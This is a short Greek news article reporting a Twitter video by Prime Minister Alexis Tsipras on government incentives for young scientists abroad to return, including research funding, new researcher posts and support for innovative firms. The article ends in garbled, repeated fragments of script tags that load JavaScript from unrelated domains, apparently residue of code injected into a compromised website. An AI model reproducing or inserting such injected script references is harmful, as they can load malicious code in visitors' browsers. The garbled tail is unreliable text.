Κίνητρα από τη κυβέρνηση για το Brain Gain

Σε ανάρτησή του στον προσωπικό του λογαριασμό του Twitter ο πρωθυπουργός Αλέξης Τσίπρας παρουσιάζει τις εξελίξεις στην έρευνα και την καινοτομία στην Ελλάδα που θα δώσουν κίνητρα στους νέους ‘Ελληνες επιστήμονες να επιστρέψουν στη χώρα.

«H κυβέρνηση δημιουργεί τις προϋποθέσεις για να επιστρέψουν οι νέοι επιστήμονες από το εξωτερικό στη χώρα τους» επισημαίνει σε νέο βίντεο που ανήρτησε στον προσωπικό λογαριασμό του στο Twitter ο πρωθυπουργός Αλέξης Τσίπρας.

Στη διάρκειά του παρουσιάζεται το κυβερνητικό έργο και εστιάζει στις εξελίξεις στην έρευνα και την καινοτομία στην Ελλάδα.

Όπως χαρακτηριστικά αναφέρεται στο βίντεο: «Για πρώτη φορά οι επενδύσεις για την έρευνα και την καινοτομία στην Ελλάδα, φθάνουν το 1% του ΑΕΠ. Η κυβέρνηση δίνει κίνητρα για την επιστροφή νέων επιστημόνων από το εξωτερικό μέσω του Ιδρύματος Ερευνας και Καινοτομίας με χρηματοδότηση 240 εκατ. ευρώ.

Δημιουργούμε 1.100 νέες θέσεις ερευνητών σε ΑΕΙ και Ερευνητικά Κέντρα.

Στηρίζουμε τις καινοτόμες επιχειρήσεις:

  • με το Ταμείο Επενδυτικών Συμμετοχών
  • με κίνητρα επενδύσεων
  • με φοροαπαλλαγή για ερευνητικές δαπάνες.

Μέσα από το πρόγραμμα «ΕΡΕΥΝΩ-ΔΗΜΙΟΥΡΓΩ-ΚΑΙΝΟΤΟΜΩ» για τη συνεργασία καινοτόμων επιχειρήσεων με ΑΕΙ και ερευνητικά κέντρα, εκταμιεύονται 394 εκατ. ευρώ.

Η έρευνα τίθεται στην υπηρεσία της κοινωνίας καθώς η Ελλάδα μπαίνει στο χάρτη της Ιατρικής του μέλλοντος με τη δημιουργία του Εθνικού Δικτύου Εξατομικευμένης Ιατρικής για την πρόληψη και τη θεραπεία του καρκίνου που θα είναι προσβάσιμο σε όλους τους πολίτες. Παράλληλα, εισάγεται η προηγμένη τεχνολογία στην αγροδιατροφή για τα εθνικά μας προϊόντα.

Ήταν δίκαιο και έγινε πράξη!»

 Για πρώτη φορά οι επενδύσεις για την έρευνα και την καινοτομία στην Ελλάδα, φθάνουν το 1% του ΑΕΠ. Η κυβέρνηση δημιουργεί τις προϋποθέσεις για να επιστρέψουν οι νέοι επιστήμονες από το εξωτερικό στη χώρα τους. https://primeminister.gr/2018/02/14/19392 

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>